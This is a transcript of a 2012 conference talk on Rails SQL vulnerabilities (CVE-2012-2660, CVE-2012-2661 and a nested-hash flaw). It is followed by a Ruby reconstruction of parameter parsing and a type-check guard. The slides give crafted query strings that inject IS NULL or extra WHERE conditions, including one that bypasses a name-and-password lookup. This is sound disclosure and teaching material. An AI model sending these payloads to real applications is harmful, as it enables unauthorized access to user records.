"Recent Rails SQL Issues" - 2012
Justin Collins
April 23, 2015
Transcript
Rails Vulnerabilities Last Week
CVE-2012-2660
CVE-2012-2661

CVE-2012-2660
Allows unexpected “IS NULL” in queries
Affects Rails 2.x and 3.x

ActiveRecord Query
unless params[:name].nil?
  @user = User.where(:name => params[:name])
end

Query Parameters
?name[]
{"name"=>[nil]}

ActiveRecord Query
unless [nil].nil?
  @user = User.where(:name => [nil])
end

Resulting SQL
SELECT "users".* FROM "users" WHERE "users"."name" IS NULL

CVE-2012-2661
Allows some manipulation of WHERE clause via “dotted” query keys
Affects Rails 3.x

ActiveRecord Query
User.where(:name => params[:name])

ActiveRecord Query
User.where("users.name" => params[:name])

Query Parameters
?name[users.id]=1
{"name"=>{"users.id"=>"1"}}

ActiveRecord Query
User.where(:name => {"users.id" => "1"})

Resulting SQL
SELECT "users".* FROM "users" WHERE "users"."id" = 1
Unreleased Vulnerability
Allows some manipulation of WHERE clause via nested hashes in query values
Affects 2.3.x and 3.x

ActiveRecord Query
User.where(:name => params[:name], :password => params[:password])

Query Parameters
?name[users][id]=1&password[users][id]=1
{"name"=>{"users"=>{"id"=>"1"}}, "password"=>{"users"=>{"id"=>"1"}}}

ActiveRecord Query
User.where(:name => {"users"=>{"id"=>"1"}}, :password => {"users"=>{"id"=>"1"}})

Resulting SQL
SELECT "users".* FROM "users" WHERE "users"."id" = 1 AND "users"."id" = 1
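All three slides share one root cause: the query-string parser turns bracketed keys into arrays and hashes, and those structures reach `where` unchecked. The following is an added example, not code from the slides or from Rails: a small pure-Ruby reconstruction of Rack-style nested parameter parsing (simplified, written for this example) that reproduces the three parameter shapes above, plus a `scalar_param` guard (a hypothetical helper) that lets only a plain String reach the query.

```ruby
require 'cgi'

# Minimal Rack-style nested query parsing, written for this example (not
# Rack's or Rails' own code) so the slide inputs can be reproduced offline:
#   "name[]"            -> {"name"=>[nil]}
#   "name[users.id]=1"  -> {"name"=>{"users.id"=>"1"}}
#   "name[users][id]=1" -> {"name"=>{"users"=>{"id"=>"1"}}}
def parse_nested_query(query_string)
  params = {}
  query_string.split('&').each do |pair|
    key, value = pair.split('=', 2).map { |s| CGI.unescape(s) }
    normalize_params(params, key, value)
  end
  params
end

def normalize_params(params, name, value)
  return params unless name =~ /\A([^\[]+)(.*)\z/
  key, rest = $1, $2
  if rest.empty?                        # plain key: name=alice
    params[key] = value
  elsif rest == '[]'                    # array key: name[] (value is nil here)
    (params[key] ||= []) << value
  elsif rest =~ /\A\[([^\]]+)\](.*)\z/  # hash key: name[child]... (recurse)
    child, remainder = $1, $2
    params[key] = {} unless params[key].is_a?(Hash)
    normalize_params(params[key], child + remainder, value)
  end
  params
end

# Hypothetical guard for the controller pattern in the slides: only a
# non-empty String may reach User.where(:name => ...). An Array (IS NULL),
# a dotted-key Hash and a nested Hash are all rejected as nil.
def scalar_param(params, key)
  value = params[key]
  value.is_a?(String) && !value.empty? ? value : nil
end

if __FILE__ == $0
  ['name=alice', 'name[]', 'name[users.id]=1', 'name[users][id]=1'].each do |qs|
    params = parse_nested_query(qs)
    puts "#{qs.ljust(18)} => #{params.inspect}  safe: #{scalar_param(params, 'name').inspect}"
  end
end
```

In a real controller the equivalent check is `params[:name].is_a?(String)` before the `where`, which closes all three cases without waiting for a framework patch.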